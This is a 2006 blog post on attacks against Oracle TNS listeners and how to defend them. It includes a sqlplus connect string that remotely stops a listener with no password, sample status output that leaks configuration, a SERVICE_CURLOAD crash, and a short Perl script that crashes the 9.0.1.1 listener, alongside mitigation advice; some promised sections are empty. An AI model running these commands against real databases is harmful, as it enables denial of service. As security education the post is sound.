21 March 2006

Listener Intrusions

The listener is a process that listens for incoming connections. When a request arrives, it is handed over to a database server process. Transparent Network Substrate (TNS) is the most common protocol used by Oracle clients to connect to the database via the listener.

Non-password protected listener

Listener is normally protected by firewall rules from remote intrusions, excluding connections coming from the Web server itself. It there is not firewall to protect listener, it is “a must� that the listener is protected by password. The commands start and status do not need a password until the version 9.2.0.1. Start can be used only on the local machine, while status can be used from anywhere in the network.

If you do not password protect the listener, the attacker can stop your listener and overwrite any file owned by oracle account.

Stopping the listener

If you don’t password protect your listener, anybody with access to the listening port can stop the listener. One of the ways to do it is:

Sqlplus whatever/whatever@(DESCRIPTION=(ADDRESS_LIST=(ADDRESS=(PROTOCOL=TCP)
(HOST=192.168.1.1)(PORT=1521)))(CONNECT_DATA=(SERVICE_NAME=PRODDB)(COMMAND=stop)))
As you can notice, you don’t actually need to provide real username and password.

Trc_file listener attack

If your listener is not password protected, anyone with access to the listening port can overwrite any file owned by Oracle, including Oracle binaries and database files.

Example for how you can overwrite Oracle binary:

Setting ADMIN_RESTRICTIONS_listener = ON in listener.ora will disallow dynamic use of set command.

Status

The listener responds to some of the network requests, like asking for the status. That gives away lots of information. If asked for STATUS, the listener returns information like this:

(DESCRIPTION=(TMP=)(VSNNUM=153093120)(ERR=0)(ALIAS=listener_rman)(SECURITY=OFF)
(VERSION=TNSLSNR for Solaris: Version 9.2.0.4.0- Production) (START_DATE=24APR200414:58:48)(SIDNUM=1)
(LOGFILE=/u01/oracle/product/9.2/network/log/listener.log)
(PRMFILE=/u01/oracle/product/9.2/network/admin/listener.ora)
(TRACING=off)(UPTIME=182)(SNMP=OFF)(PID=23605)).K........
(ENDPOINT=(HANDLER=(HANDLER_MAXLOAD=0)(HANDLER_LOAD=0)
(ESTABLISHED=0)(REFUSED=0)(HANDLER_ID=D8C752B7CA00-5C35-E034-000080000001)
(PRE=any)(SESSION=NS)(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)
(HOST=kermit)(PORT=1521))))),(SERVICE=(SERVICE_NAME=rman)
(INSTANCE=(INSTANCE_NAME=rman)(NUM=1)
(INSTANCE_STATUS=UNKNOWN)(NUMREL=1))),,.........@

NUM number 153093120 turned to HEX is 920400, which is a version number.

Listener Service_Curload attack

If you issue the command (CONNECT_DATA=(COMMAND=SERVICE_CURLOAD)) to the listener and connect, listener is fine as long as you are connected. When the user disconnects, the service will crash or stop accepting new connections.

Not all versions are vulnerable, the following versions are known to be vulnerable:
Oracle 8.1 up to 9.2.0.2, with use of MTS

Patch number 2540219 is issued to repair the problem.

With SERVICE_CURLOAD dispatchers report or ask for the current load from the listener.

9.0.1.1 Listener crash

Vulnerable systems: Oracle version 9.0.1.1.

The vulnerability allows remote attackers to cause the server's TSNLISTEN service to crash disallowing any legitimate requests from being handled by the remote server.

In order to crash Oracle9i all you need to do is send ONE TCP packet (#$00 = 1 byte) to 1521 port. To restore server functionality you must restart the TSNLISTEN service.

Sending 1 kilobyte of data in the connection string caused crash:

#!/usr/local/bin/perl -w
use IO::Socket;
$host="hostname";
socket(HANDLE, PF_INET, SOCK_STREAM, 6);
connect(HANDLE, sockaddr_in(1521, scalar gethostbyname($host)));
HANDLE->autoflush(1);
sleep(2);
print HANDLE "1";
close(HANDLE);

Defence Against Listener Intrusions


// posted by Tatjana (Tanja) Kane @ 3/21/2006
Comments: Post a Comment



<< Home

This page is powered by Blogger. Isn't yours?